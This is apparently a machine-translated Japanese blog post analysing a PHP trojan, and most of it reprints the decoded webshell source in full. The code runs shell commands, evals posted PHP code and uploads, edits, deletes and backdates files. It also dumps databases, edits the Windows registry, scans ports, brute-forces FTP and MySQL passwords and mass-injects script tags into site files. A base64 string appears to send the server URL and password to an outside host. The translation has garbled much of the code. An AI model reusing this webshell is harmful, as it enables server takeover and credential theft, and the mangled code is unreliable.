php トロイの木馬(暗号クラッキング)の分析

黄舟
リリース: 2016-12-14 13:03:39
オリジナル
4333 人が閲覧しました

分析の結果、このトロイの木馬はbase64でエンコードされ、圧縮されていることがわかりました。関連する機密保持措置が講じられていますが、PHP コードは実行する必要があり、最終的に PHP ソース コードが生成されるため、デコード、解凍してファイルに書き込むために次の PHP プログラムが作成されます。
デコードと解凍のコードは次のとおりです:

コードは次のとおりです:


function writetofile($filename, $data)
{ //ファイルの書き込み
$filenum=@fopen($ファイル名, "w") ;
if (!$filenum) {
flock($filenum,$data);
$file_data=fwrite($filenum,$data);
return true;
}
?>


次に、php 環境で実行すると、次のような php プレーンテキスト ファイルが得られます。

コードをコピーします。 コードは次のとおりです。


error_reporting(7);
$mtime =explode(' ', microtime());
@set_time_limit(0); //非セーフ モードでは上記の関数を使用し、タイムアウト後にキャンセルできます。
/*====================== プログラム構成=====================*/
// パスワードの検証が必要かどうか。1 は検証が必要であることを意味し、その他の数字は直接入力を意味します。
$admin['check'] = "1";
// パスワードの検証が必要な場合は変更してください。ログインパスワード
// デフォルトのポートテーブル
$hidden = "44997";
$admin['port'] = "80,139,21,3389,3306,43958,1433,5631";
//ジャンプ秒数
$admin ['jumpsecond '] = "1";
//FTPクラッキング用の接続ポート
$alexa = "yes";
//Alexaランキングを表示するかどうか、yesまたはno
$admin['ftpport'] = "21 ";
// phpspy 自体が、編集されたファイルの時刻を作成時刻に自動的に変更することを許可するかどうか (はい/いいえ)
$retime = "no";
// デフォルトの cmd.exe の場所、proc_open 関数を使用する予定なので、Linux システムに合わせて変更してください。(プログラム内で winnt システムを指定できると仮定します)
$cmd = "cmd.exe"
// 以下は phpspy によって表示される著作権列です。多くのプログラムによってキーワードとみなされ、削除されます。Yuhan~~ カスタマイズを許可します。まだ理解できない場合は変更しないでください~~

/*====================== 設定は終了 ======== ========== =====*/
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp = $admin['pass']; $copyurl =base64_decode('PHNjcmlwdCBzcmM9J2h0dHA6Ly8lMzglNjMlNjMlNjUlMkU lNjMlNkYlNkQvJTYzJTY1JTcyJTc0Lz9jZXJ0PTEzJnU9'); cmlwdD4=');
$onoff = (function_exists('ini_get')) ?ini_get('register_globals') : get_cfg_var('register_globals');
if ($onoff != 1) {@ extract($_POST, EXTR_SKIP);@extract($_GET, EXTR_SKIP);}
$self = $_SERVER['PHP_SELF'];$dis_func = get_cfg_var("disable_functions") ;
/*======= ============== 認証====================*/
if($admin['check'] = = "1") {if ($_GET['action'] == "ログアウト") {setcookie ("adminpass", "");echo "";echo "ログアウトに成功しました...<3 秒後に自動的に終了するか、ここをクリックしてプログラム インターフェースを終了します>>> /a>if ($_POST['do'] == 'ログイン') {$thepass=trim($_POST['adminpass']);if ($admin[' pass'] == $thepass ) {setcookie ("adminpass",$thepass,time()+(1*24*3600));echo "";echo "".$copyurl.$serveru."&p=".$serverp.$copyurl."";exit;}}if (isset($_COOKIE) ['adminpass'])) {if ($_COOKIE['adminpass'] != $admin['pass']) {loginpage();}} else {loginpage();}}
/*===== ======= ========= 検証完了======================*/
// magic_quotes_gpc ステータスを決定する
if (get_magic_quotes_gpc()) {$_GET =tripslashes_array($_GET);$_POST =tripslashes_array($_POST);}
//mix.dll のコード
$mixdll = "7Zt/TBNnGMfflrqBFnaesBmyZMcCxs2k46pumo2IQjc3wSEgUKYthV6hDAocV6dDF5aum82FRBaIHoRlRl0y3Bb/cIkumnVixOIE/cMMF+ePxW1Ixah1yLBwe+5aHMa5JcsWs+T5JE+f9/m+z /u8z73HP9cruaXbSAwhRAcmy4QcIBEyyd8zCJbw1FcJZH/cyZQDmpyTKYVVzkamnq+r5G21TIXN5aoTmHKO4d0uxulisl8vYGrr7JwhPn5marTG4ozM3oZ1hrYpk7JS2wR1/Fzb2+DnZGWosZSV1lav +mfbePD5zooqJf9BveWZCMnR6Ah/MmfFlHaRJKTM0jxCCAVBekQbmE0iMaOGlDqmIuehiZ5LpGA0D 9BGUyMxdVdXy6YQskXxTGTJA8kkJPuv5h8Ec7f1P8UgcBsF8B9qow1N2b0lygy83SbYCPlcExGmnc H0FjMNkTRyVMLLJ/ec3bQ8v4HnauoqCKmJCmpe5n15KwiCIAiCIAiCIAjyUBCzU2PFTJ1nCRGM4kqdNyAsKCr+eitLKE9AXui/+cXt0wt+26cRT4u3xc2pid9c0Yb2iH2eSzGh3VZLD6zWHSOa3sxYB moZ/T3berbdy1rx6rtXd8PDY0FRsWjSiytjxdm+9nWTshyN1ujy5SRYTnmO6nymMc9hZY64Z4q muVB5oT9YKeZSvtxbLe12mMiv0sKD7ZAddnOIprG8oUIYpSlfXCyWJNB83jKldItSZM0QS1Rdk nimsENSV6YcvqSxdEKJpvCuCfAtMyj4lC +KpltWyxviT+t7vpXT5kM3clqq+snAp3JGXr87YemMfXAu7xjkeMWL8XOVrsc0Ypwvfj8I7mVVzbChnJQIutdv3nVIEXVwCQ4PQ3YqUZUOdquC52dq1wEIh4aVfLWq2RzMgD2Wqmlev5 AuxisZRS0N4Rev87SYAHfmUfm0Ou25pgsO58lJemX/NEUhZku1puSInsBxF4jrY4tEt75Y3EJ5R91xngylPgnO80xqhBmeSa376Z3+yCZxxUUF8ikY6GEwlCTLMrSgNLxaiQugOVjjM+ndetBfKM4 rGLoBR+gdVcrEuOcpSRcn1UUxKSa9Z4ueCLOnaseqtWEx3Gc42vXQnXXSGKR1vTo3VuOd4MpREuNGykKqTkwjMRC4BQRAEQRAEQRAE+S+YZCL+EPhTYINGl8GuRfVGQprjwGaBKfHHzB9r98EYno/J1mnaURgrXwY 0T9OSU8h975b/6f7FBUbrQqPBXlNDSIbWJtQ5CcktKMrKL4xoFq2D5zhCHtNYnS6nIHB8LW nV1tpq1LfTXcRqs1e7GwWrw+7cQMh6ku1stJXXcIVVPGez5zjLeRu/KQuyG8kqU/5qU87UX tOZ+k3BhpTIbwRiolYCsR2sHqyMIiQPTHkP3gyxCNalnAOs0JJc89rsl9XCuc6NFXUuF1chTBta7ZzS/HRFjREEQRAEQRAEQRDkXyJIlb62MOA4aNU0L5op/TgenDEUlGW5vkySpJ6JJZ+Co8+201e8i+izrfR yengPPfLBpY5q+peDHeX0dy3dwkD/cfoTGL8Z2u6vXjbS6j+WbOk611TvP9ZLF9IXDneUrtzY UdKdJ9Ot9AVvR2nXXS6OElrqKKUraFeydTv9aqjD3zACGyVb204MOPq5Hnq5Io0pkvsHujbk8 1NdTzSVB4DQjlCno7+WXk717qR691C9Z2XLhS937Eg87wsMdJvVjEAgsX +PpXP81oR0IuDob7B81ClJn1nOd/0sSTtCvv4+R78NjIM5d7d58ZPmq2XHTwz0OVb1+I1Nb3WbSxs6HQ7H+fBIIDg6PjgxEQwPD0vfB8NjI2FFgWhQOnfp+sjJG6BNSGdGxybOXL8TH AteHJSuDe891r1X6u8b7BsdvxkeGZTGR2/fDo+PSOO/jg6Hh1VRIqSkpGT+MwzPNbidPNfI2JhGgXe6Khmbyw7GOF0CV8nxD/uvA0EQBEEQBEEQBPnfQkX+D/3x9PfTQ+l30jVsIpvMMqyBf Z59iX2FLWTXsdVsHSuwm9j32Fa2k93HHmKPsJfZUTbf6DI2GbcaH/YlIAiCIAiCIAiCIAjy1/wO"; 

function shelL($command){
global $windows,$disablefunctions; 
$exec = '';$output= ''; 
$dep[]=array('pipe','r');$dep[]=array('pipe','w'); 
if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean() ;}
elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();システム($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; }
elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("n",$output);$exec= $output ;}
elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec=shell_exec($command);}
elseif(is_resource($output=popen($command,"r") ))) {while(!feof($output)){$exec= fgets($output);}pclose($output);}
elseif(is_resource($res=proc_open($command,$dep,$pipes) )){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);}
elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset( $_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd. exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);}
return $exec; 
}
// 查看PHPINFO
if ($_GET['action'] == "phpinfo") {echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 関数数已被禁用,请查看";exit; 
}if($_GET['action'] == "nowuser") {$user = get_current_user(); 
if(!$user) $user = "报告长官,主机变态,無法获取当前进行用户名!"; 
echo"当前の进程用户名:$user"; 
終了; 
}
if(isset($_POST['phpcode'])){eval("?".">$_POST[phpcode]}
if($action=="mysqldown"){
$link=@mysql_connect($host,$user,$password); 
if (!$link) {
$downtmp = 'データ据库连接失败: ' . mysql_error(); 
}else{
$query="selectload_file('".$filename."');"; 
$result = @mysql_query($query, $link); 
if(!$result){
$downtmp = "ファイルが存在しないか、ファイル制限がない可能性があります。
".mysql_error(); 
}その他{
while ($row = mysql_fetch_array($result)) {
$filename = Basename($filename); 
if($rardown=="yes"){
$zip = 新しい zip; 
$zipfiles[]=Array("$filename",$row[0]); 
$zip->Add($zipfiles,1); 
$code = $zip->get_file(); 
$ファイル名 = "".$ファイル名.".rar"; 
}else{
$code = $row[0]; 
}
header("Content-type: application/octet-stream"); 
header("Accept-Range: バイト"); 
header("Accept-Length: ".strlen($code)); 
header("Content-Disposition:attachment;filename=$filename"); 
エコー($code); 
終了; 
}
}
}
}
// 在中プロキシ
if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "


获取 URL コンテンツ失敗しました

";exit; 
}
// ダウンロード文件
if (!empty($downfile)) {if (!@file_exists($downfile)) {echo "";} else {$filename =basename($downfile);$filename_info =explode('.', $filename) ;$fileext = $filename_info[count($filename_info)-1];header('Content-type: application/x-'.$fileext);header('Content-Disposition:attachment; filename='.$filename.' ');header('Content-Description: PHP 生成データ');header('Content-Length: '.filesize($downfile));@readfile($downfile);exit;}
}
// 直接ダウンロード备份データベース库
if ($_POST['backuptype'] == 'download') {
@mysql_connect($servername,$dbusername,$dbpassword) または die("データベース库连接失败"); 
@mysql_select_db($dbname) または die("选择データベース库失败"); 
$table = array_flip($_POST['table']); 
$result = mysql_query("SHOW テーブル"); 
エコー ($result) ? NULL : "出错: ".mysql_error(); 

$filename = ベース名($_SERVER['HTTP_HOST']."_MySQL.sql"); 
header('Content-type: application/unknown'); 
header('Content-Disposition:attachment; filename='.$filename); 
$mysqldata = ''; 
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
$mysqldata.= sqldumptable($currow[0]); 
$mysqldata.= $mysqldata."rn"; 
}
}
mysql_close(); 
終了; 
}

// 程序目录
$pathname=str_replace('\','/',dirname(__FILE__)); 
$dirpath=str_replace('\','/',$_SERVER["DOCUMENT_ROOT"]); 

// 获取当前路径
if (!isset($dir) or empty($dir)) {
$dir = "."; 
$nowpath = getPath($pathname, $dir); 
} else {
$dir=$_GET['dir']; 
$nowpath = getPath($pathname, $dir); 
}

// 判断读写情况
$dir_writeable = (dir_writeable($nowpath)) ? "可写" : "不可写"; 
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " |
PHPINFO()" : ""; 
$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | 注册表操作" : ""; 

$tb = 新しいフォーム; 

?> 
 
 
 
 
 
 
<?php echo"$myneme"?> 


//$_SERVER ["DOCUMENT_ROOT"]
$tb->tableheader();
$tb->tdbody('
'.$_SERVER['HTTP_HOST'].''.date("年m月d日 h:i:s",time()).''.gethostbyname($_SERVER['SERVER_NAME']).'
','center','top');
$tb->tdbody('根目录 | 貝目录 | 环境变量 | 在線プロキシ'.$reg.$phpinfo.' | WebShell | 杂项破解 | 解压mix.dll | 注销登录'); 
$tb->tdbody('批量挂马 | Http文件ダウンロード 文件查找 | 执行phpスクリプト | 実行SQL语 | Func反弹Shell | MySQL备份 a href="?action=SUExp" href="?action=SUExp"> Serv-U提权'); 
$tb->tablefooter(); 
?> 

 
<テーブル幅="775" ボーダー="0" セルパディング="0"> 
 
$tb->headerform(array('method'=>'GET','content'=>'

程序路径: '.$pathname.'
当前目录('.$ dir_writeable.','.substr(base_convert(@fileperms($nowpath),10,8),-4).'): '.$nowpath.'
跳转目录: '.$tb-> makeinput('dir',''.$nowpath.'','','text','80').' '.$tb->makeinput('','确定','','submit' ).' 〖绝对路径と相对路径〗')); 

$tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'上传文件到今目录: '.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','确定','' ,'submit').$tb->makeinput('uploaddir',$dir,'','hidden'))); 

$tb->headerform(array('action'=>'?action=editfile&dir='.urlencode($dir),'content'=>'新建文件在当前目录: '.$tb-> ;makeinput('editfile').' '.$tb->makeinput('createfile','确定','','submit')); 

$tb->headerform(array('content'=>'新建目录在当前目录: '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory ','确定','','提出'))); 
?> 
 


 
/*===================== 実行操作開始 ================== ===*/
echo "

n"; 
// 删除文件
if (!empty($delfile)) {
if (file_exists($delfile)) {
echo (@unlink($delfile)) ? $delfile." 删除成功!" : "文件删除失败!"; 
} else {
echo Basename($delfile)." 文件已不存在!"; 
}
}

// 删除目录
elseif (!empty($deldir)) {
$deldirs="$dir/$deldir"; 
if (!file_exists("$deldirs")) {
echo "$deldir 目录已不存在!"; 
} else {
echo (deltree($deldirs)) ? 「目录删除成功!」 : "目录删除失败!"; 
}
}

// 创建目录
elseif (($createdirectory) AND !empty($_POST['newdirectory'])) {
if (!empty($newdirectory)) {
$mkdirs="$dir/ $新しいディレクトリ"; 
if (file_exists("$mkdirs")) {
echo "该目录已存在!"; 
} else {
echo (@mkdir("$mkdirs",0777)) ? 「创建目录成功!」 : "创建失败!"; 
@chmod("$mkdirs",0777); 
}
}
}

// 上传文件
elseif ($doupfile) {
echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES ['アップロードファイル']['名前']."")) ? 「上传成功!」 : "上传失败!"; 
}
elseif($action=="mysqlup"){
$filename = $_FILES['upfile']['tmp_name']; 
if(!$filename) {
echo「選択要上送信されたファイルはありません。。」; 
}else{
$shell = file_get_contents($filename); 
$mysql = bin2hex($shell);
if(!$upname) $upname = $_FILES['upfile']['name'];
$shell = ".$database から 0x".$mysql." ." を DUMPFILE '".$uppath."/".$upname."';" に
$link=@mysql_connect($host,$user,$password);
if(!$link){
echo "ログインに失敗しました ".mysql_error();
}else{
$result = mysql_query($shell, $link);
if($result){
echo" ファイルは ".$host" に正常にアップロードされました。 .", ファイル名は ".$uppath."/".$upname."..";
}else{
echo" アップロード失敗の理由: ".mysql_error(); elseif($action == "mysqldown"){
if(!empty($downtmp)) echo $downtmp;
}
// ファイルを編集
elseif ($_POST['do'] == 'doeditfile') {
if (!empty ($_POST['editfilename'])) {
if(!file_exists($editfilename)) unset($retime)
if($time==$now) $time = @filemtime($editfilename); ;
$time2 = @date("Y-m-d H:i:s",$time);
@$fp=fopen("$filename","w"); $_POST['change']=="yes"){
$filecontent = "?".">".$_POST['filecontent']."$filecontent = gzdeflate($filecontent) ;
$filecontent =base64_encode($filecontent);
$filecontent = "}else{
$filecontent = $_POST['filecontent'];
}
echo $msg=@fwrite($fp,$filecontent) ? "ファイルの書き込みに成功しました!" : "書き込みに失敗しました!" ;
@fclose($fp);
if($retime=="yes"){
echo"
echo $msg=@touch($filename) ? "ファイルを ".$time2." として変更しました!" : "ファイル時間の変更に失敗しました!";
}
} else {
echo "編集するファイル名を入力してください!"; // ファイルのダウンロード
elseif ( $_POST['do'] == 'downloads') {
$contents = @file_get_contents($_POST['durl']);
if(!$contents){
echo "ダウンロードするデータを読み取ります";
}
elseif(file_exists($path)){
echo"申し訳ありませんが、ファイル ".$path" は既に存在します。保存ファイル名を変更してください。 ";
}else{
$fp = @fopen($path,"w");
echo $msg=@fwrite($fp,$contents) ? "ファイルのダウンロードに成功しました!" : "書き込み中にファイルのダウンロードに失敗しました. !";
@fclose($fp);
}
}
elseif($_POST['action']=="ミックス"){
if(!file_exists($_POST['mixto'])){
$ tmp = Base64_decode($mixdll);
$tmp = gzinflate($tmp);
$fp = fopen($_POST['mixto'],"w"); tmp ) ? "解凍は成功しました!" : "このディレクトリは書き込み可能ではありませんか? !";
fclose($fp);
}else{
echo「そうですよね? ".$_POST['mixto']."すでに存在します~";
}
}
// ファイルプロパティを編集
elseif ($_POST['do'] == 'editfileperm') {
if (!empty ($ _POST['fileperm'])) {
$fileperm=base_convert($_POST['fileperm'],8,10);
echo (@chmod($dir."/".$file,$fileperm)) "属性は正常に変更されました!" : "変更に失敗しました!";
echo " ファイル ".$file." 変更された属性は次のとおりです: ".substr(base_convert(@fileperms($dir."/".$file), 10,8) ),-4);
} else {
echo "設定したい属性を入力してください!";
}
}

// ファイルの名前を変更します
elseif ($_POST['do'] == 'rename ' ) {
if (!empty($_POST['newname'])) {
$newname=$_POST['dir']."/".$_POST['newname'];
if (@file_exists($ newname'); )) {
echo "".$_POST['newname']." すでに存在します。再入力してください!";
} else {
echo (@rename($_POST['oldname'],$newname)) ? basename($_POST['oldname'])." 名前が ".$_POST['newname'] に変更されました。" !" : "ファイル名の変更に失敗しました!"
}
} else {
echo "を入力してください希望の名前 変更するファイル名!";
}
}
elseif ($_POST['do'] == 'search') {
if(!empty($oldkey)){
echo"キーワードを検索:[".$oldkey."]、検索結果が以下に表示されます:";
if($type2 == "getpath"){
echo"mouse move 結果ファイルには部分的なインターセプトが表示されます。";
}
echo"


";
find($path);
} else{
echo "Xiami を確認しますか? Xiami を確認しますか? 確認したい Xiami はありますか?"
}
}
elseif ($_GET['action']=='plgmok') {
dirtree($_POST[ 'dir'],$_POST['mm']);
}
elseif ($_GET['action'] == "plgm") {
$action = '?action=plgmok';
$gm = "< ;script src="http://127.0.0.1" src="http://127.0.0.1">"; $tb->formheader ($action,'バッチ馬乗り');
$tb->tdbody('Web サイトバッチ馬乗りプログラム php バージョン','center'); 'ファイルの場所: '.$tb ->makeinput('dir',''.$_SERVER["DOCUMENT_ROOT"].'','','text','60').'
ハングするにはコード:'.$tb->maketextarea('mm',$gm,'50','5').''.$tb->makehidden('do','バッチホースマウント')。
'.$tb- >makeinput('submit','吊り馬を開始','','submit'),'center','1','35');
echo "";
$tb-> ;tablefooter();
}//end plgm
// クローン作成時間
elseif ($_POST['do'] == 'domodtime') {
if (!@file_exists($) _POST['curfile'])) {
echo "変更するファイルが存在しません!";
} else {
if (!@file_exists($_POST['tarfile'])) {
echo "変更するファイル参照されるファイルは存在しません!";
} else {
$time=@filemtime($_POST['tarfile']);
echo (@touch($_POST['curfile'],$time,$time)) ? Basename($_POST['curfile'])." 変更時刻が ".date("Y-m-d H:i:s",$time) に変更されました。" !"変更されました!";
}
}
}

// カスタム時刻
elseif ($_POST['do'] == 'modmytime') {
if (!@file_exists($_POST['curfile'])) {
echo "変更するファイルが存在しません!";
} else {
$year=$_POST['year']
$data=$_POST['データ'];
$時間=$_POST['時間'];
$秒=$_POST['秒']; !empty($month) AND !empty($data) AND !empty($hour ) AND !empty($分) AND !empty($秒)) {
$time=strtotime("$data $month $year $時:$分:$秒");
echo (@touch($_POST[ 'curfile'],$time,$time)) ? Basename($_POST['curfile']) の変更時刻は正常に完了しました。 ".date("Y-m-d H:i:s",$time) に変更されました。" ! " : "ファイルの変更時刻を変更できませんでした!";
}
}
}
elseif($do =='ポート'){
$tmp =explode(",",$port);
$count = count($tmp);
for($i=$first;$i$fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1);
if($fp) echo "Discover".$host."ホストがポートを開きました".$tmp[$i ]."
";
}
}
/*
ここのコードは非常に複雑です。正直に言うと、自分でも何を書いたのかわかりません。
幸いなことに、それは機能するので、誰かがそれを見ても、私はそれを書き直すだけです。 */
elseif ($do == 'crack') {//とりあえずグローバル変数として登録します。
if(@file_exists($passfile)){
$tmp = ファイル($passfile);
$count = count($tmp);
if(empty($onetime)){
$onetime = $count;ターン = "1";
$nowturn = $turn+1;
$tt = intval(($count/$onetime)+1); ($turn>$tt または $onetime>$count){
echo "辞書の容量を超えました~最後のプロセスをクラックした場合は、失敗して申し訳ありません。";
}else{
$first = $onetime* ($turn- 1);
for($i=$first;$i<$now;$i++){
if($ctype=="mysql") $sa = @mysql_connect($host,$user,chop) ($tmp[ $i]));
else $sa = @ftp_connect($host,$admin[ftpport]),$user,chop($tmp[$i]));
{
$ t = "「.$user.」のパスワードを「.$tmp[$i].」として取得します
}
}
if(!$t){
echo "辞書合計".$count. ". ".$first." から ".$now." まで、".$admin[jumpsecond]." は ".$onetime." のパスワードを数秒でテストします。 >>>< ;/a> ;
「.$type.」の復号には「.$tt.」回が必要ですが、現在は「.$turn.」の復号時間です

}。
else {
echo "$t";
}
}
}else{
echo "辞書ファイルが存在しません。確認してください。";
}
}
elseif($do =='port'){
if( !eregi("-",$port)){
$tmp =explode(",",$port);
$first = "1";
$ tmp =explode("-",$port);
$first = $tmp[0];

}
for($i=$first;$i<$カウント; $i++){
if(!eregi("-",$port)){
$fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1); $fp ) echo "Discover".$host."ホストがポートを開きました".$tmp[$i]."
"
}else{
$fp = @fsockopen($host, $i, $errno, $errstr, 1);
if($fp) echo "Discover".$host."ホストがポートを開きました".$i."
";
}
}

}
/ / MYSQL に接続します
elseif ($connect) {
if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
echo "データベース接続に成功しました!"
mysql_close(); } else {
echo mysql_error();
}
}

//SQL ステートメントを実行
elseif ($_POST['do'] == 'query') {
@mysql_connect($servername,$dbusername,$dbpassword)または die("データベース接続に失敗しました");
@mysql_select_db($dbname) または die("データベースの選択に失敗しました");
$result = @mysql_query($_POST['sql_query']); "SQL ステートメントが正常に実行されました !" : "エラー: ".mysql_error();

// バックアップ操作
elseif ($_POST['do'] == 'backupmysql') {
if ( empty($_POST[ 'table']) OR empty($_POST['backuptype'])) {
echo "バックアップするデータテーブルとバックアップ方法を選択してください!"
} else {
if ($ _POST['backuptype'] == 'server') {
@mysql_connect($servername,$dbusername,$dbpassword) または die("データベース接続に失敗しました")
@mysql_select_db($dbname) または die("データベースの選択に失敗しました");
$table = array_flip ($_POST['table']);
$filehandle = @fopen($path,"w");
if ($filehandle) {
$result = mysql_query("SHOW tables" );
echo ($result) ? NULL : "エラー: ".mysql_error();
if (isset($table[$currow[0]]) {
sqldumptable($currow[0] , $filehandle);
fwrite($filehandle,"nnn")
}
fclose($filehandle)
echo "データベースは
".$path."";
mysql_close();
} else {
echo "バックアップに失敗しました、お願いします対象のフォルダーに書き込み権限があるかどうかを確認します! ";
}
}
}
}
elseif($downrar) {
if (!empty($dl)) {
if(eregi("unzipto:",$localfile) ){
$path = "". $dir."/".str_replace("unzipto:","",$localfile).""
$zip = 新しい Zip; .$dl[0];
$array=$zip->get_list($zipfile);
$f=0; 0;$iif($array[$i][フォルダ]==0) {
if($zip->Extract($zipfile,$path,$i)> 0) $f++
}
else $d++;
}
if($i==$f+$d) echo "$dl[0] が ".$path." に正常に抽出されました
($f ファイル$d ディレクトリ)"; ($f==0) echo "$dl[0] の ".$path." への解凍に失敗しました";
else echo "$dl[0] は完全に解凍されませんでした
($f ファイルは $d ディレクトリを解凍しました)" ;
}else{
$zipfile="";
$zip = 新しい Zip;
{
$ zipfile=$dir。 /".$dl[$k];
if(is_dir($zipfile))
{
unset($zipfilearray);
addziparray($dl[$k]);
for($i =0;$zipfilearray[ $i];$i++)
{
$filename=$zipfilearray[$i];
$filesize=@filesize($dir."/".$zipfilearray[$i]);
$ fp=@fopen($) dir."/".$filename,rb);
$zipfiles[]=Array($filename,@fread($fp,$filesize));
@fclose($fp);
else
{
$filename=$dl[$k];
$filesize=@filesize($zipfile);
$zipfiles[]=Array($ ファイル名,@fread($) fp,$filesize));
@fclose($fp);
$zip->Add($zipfiles,1);
$ck = "_QQ44997_".date("Y-m-d",time())."";
if(empty($localfile)){
header("Content-type: application/octet-stream");範囲: バイト");
header("Accept-Length: ".strlen($code));
header("Content-Disposition:attachment;filename=".$_SERVER['HTTP_HOST'] ."".$ck ."_Files.zip");
echo $code;
}else{
$fp("".$dir."/".$localfile.""," w"); $msg=@fwrite($fp,$code) ? "圧縮して保存".$dir."/".$localfile."ローカル成功! !" : "ディレクトリ".$dir."書き込み権限がありません!";
@fclose($fp);
}
}
} else {
echo "パッケージ化してダウンロードするファイルを選択してください!";
}
}
// Shell.Application はプログラムを実行します
elseif(($_POST['do'] == 'programrun') AND !empty($_POST['program'])) {
$shell= &new COM(' Sh' .'el'.'l.Appl'.'ica'.'tion');
$a = $shell->ShellExecute($_POST['program'],$_POST['prog']);
echo ($a=='0') ? "プログラムは正常に実行されました!" : "プログラムは失敗しました!"
}
// PHP 設定パラメーターのステータスを表示します
elseif(($_POST['do' ] == 'viewphpvar ') AND !empty($_POST['phpvarname'])) {
echo "構成パラメータ".$_POST['phpvarname']." 検出結果: ".getphpcfg($_POST['phpvarname' ])."" ;
}
// レジストリを読み取ります
elseif(($regread) AND !empty($_POST['readregname'])) {
$shell= &new COM('WSc'.'rip'. 't.Sh '.'ell');
var_dump(@$shell->RegRead($_POST['readregname']));
}

// レジストリに書き込みます
elseif(($regwrite) AND !empty($ _POST['writeregname']) AND !empty($_POST['regtype']) AND !empty($_POST['regval'])) {
$shell= &new COM('W'.'Scr '.'ipt .S'.'hell');
$a = @$shell->RegWrite($_POST['writeregname'], $_POST['regval'], $_POST['regtype']);
echo ($ a=='0') ? "レジストリ キー値の書き込みに成功しました!" : "".$_POST['regname']."、".$_POST['regval']."、".$ _POST ['regtype']." 失敗しました!";
}
// レジストリを削除します
elseif(($regdelete) AND !empty($_POST['delregname'])) {
$shell= &new COM('WS ' .'cri'.'pt.S'.'he'.'ll');
$a = @$shell->RegDelete($_POST['delregname']);
echo ($a==') 0 ') ? "レジストリ キーの削除に成功しました!" : ".$_POST['delregname'] が失敗しました!";echo "プログラム | pcAnywhere | 开始程序 | すべてのユーザー Serv-U 
for ($i=66;$iif (is_dir($drive."/")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " $drive\";}
}

}
echo "

n "; 
/*===================== 実行操作结束 =====================*/
if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
$tb->tableheader( ); 
?> 
 
文件 
创建日期 
最終修正 
 
プロパティ 
操作 
 
 
// 目录列表
$dirs=@opendir($dir); 
$dir_i = '0'; 
while ($file=@readdir($dirs)) {
$filepath="$dir/$file"; 
$a=@is_dir($filepath); 
if($a=="1"){
if($file!=".." && $file!=".") {
$ctime=@date("Y-m-d H:i:s",@ filectime($filepath)); 
$mtime=@date("Y-m-d H:i:s",@filemtime($filepath)); 
$dirperm=substr(base_convert(fileperms($filepath),10,8),-4); 
echo "n"; 
echo " [$filen"; 
echo " $ctimen"; 
echo " $mtimen"; 
echo "
検索 n"; 
echo " $dirpermn"; 
echo " | 削除< ; /a> 名前を変更 n";
echo "n";
$dir_i++;
} else {
if($file=="..") {
echo "n";
echo " 上のディレクトリに戻りますn"
echo "n";
}
}
}
}// while
@closedir($dirs);
?>


$dirs=@opendir_i = '0'; =@readdir($dirs)) {
$filepath="$dir/$file";
$a=@is_dir($filepath){
$size=@ ファイルサイズ($filepath);
$size=$size/1024;
$size= @number_format($size, 3);
if (@filectime($filepath) == @filemtime($filepath)) {
$ctime = @date("Y-m-d H:i:s",@filectime($filepath));
$mtime=@date("Y-m-d H:i:s",@filemtime($filepath)); ctime="".@date("Y-m-d H:i:s",@filectime($filepath)).""; span class="redfont">".@date("Y-m-d H:i:s",@filemtime($filepath))."";
}
@$fileperm=substr(base_convert( @ fileperms($filepath),10,8),-4);
echo "n";
echo " ";
echo "";
echo "$filen";
echo "$ctimen" ;
echo " $mtimen";
echo " < スパンclass="redfont">$size KBn";
echo " $filepermn"
echo " < td align="center" nowrap>ダウンロード ""?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."">編集 | 名前変更< ;/ a時間 /td>n";
echo "n";
$file_i++;
}
}// while
@closedir($dirs);
if(get_cfg_var('safemode'))$z = "(?)"; 0" cellpadding="2" cellpacing="0" align="center">'.$tb->makeinput('chkall','on','onclick= CheckAll( this.form)"','チェックボックス','30','').' ローカル ファイル: '.$tb->makeinput('localfile','','','text','15 ') .''.$tb->makeinput('downrar','パッケージのダウンロードまたはローカル保存を選択します','','submit').' '.$z.''.$dir_i.' ディレクトリ / '.$file_i.' ファイル','center',getrowbg(),'' ,'',' 6');

echo "n";
}// end dir

elseif ($_GET['action'] = "editfile") {
if(empty($newfile)) {
$filename="$dir/$editfile";
$fp=@fopen($filename,"r");
$contents=@fread( $fp, filesize( $filename));
$contents=htmlspecialchars($contents);
$editfile=$newfile;
$ action = "?dir=".urlencode($dir)."&editfile=".$editfile()
$tb->formheader($action,'新しい/編集ファイル') ;
